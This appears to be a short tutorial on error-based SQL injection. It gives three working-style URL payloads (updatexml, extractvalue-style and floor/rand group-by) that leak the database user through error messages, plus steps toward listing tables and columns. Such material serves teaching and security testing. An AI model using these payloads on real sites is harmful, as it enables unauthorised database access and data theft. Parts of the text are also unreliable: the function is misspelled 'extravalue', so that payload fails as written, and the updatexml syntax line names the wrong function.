- Overview
Error-Based Injection involves deliberately triggering error conditions in the database to make query results appear in error messages. This technique is particularly useful in cases where UNION-based injections are restricted and error information can be returned. It’s also known as Formulaic SQL Injection.
- Utilizing the updatexml() function:
Payload:
1 | ?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));--+ |
0x7e: ~updatexml(): Function used to update XML documents.updatexml() syntax: update(target_xml_document, xpath_expression, new_value)
XPath expressions are used to specify paths within an XML document. If the format is incorrect, an error will occur.
Subsequent steps for updatexml-based error-based injection:
(1). Modify the SQL statement for selecting the user position.
(2). Retrieve tables in the current database.
(3). Retrieve columns of a specific table.
(4). Continue step by step.
- Utilizing the extravalue() function:
Payload:
1 | ?id=1' and (extravalue(1,concat(0x7e,(select user()),0x7e)))--+ |
extravalue() function is similar to updatexml() and is used for querying node content in an XML document.
Subsequent steps for extravalue-based error-based injection are the same as for updatexml.
- Utilizing the floor() function:
Payload:
1 | ?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ |
The principle utilized is the repetition of primary keys due to the repetitiveness of floor(rand(0)*2), leading to an error in the group by statement.
The group by key principle involves looping through every row of data and saving the results in a temporary table. When reading each row’s key, if the key exists in the temporary table, it won’t update the temporary table’s data. If the key doesn’t exist, it will insert the key’s row data into the temporary table.
- Additional Information:
These three functions are commonly used in error-based injections.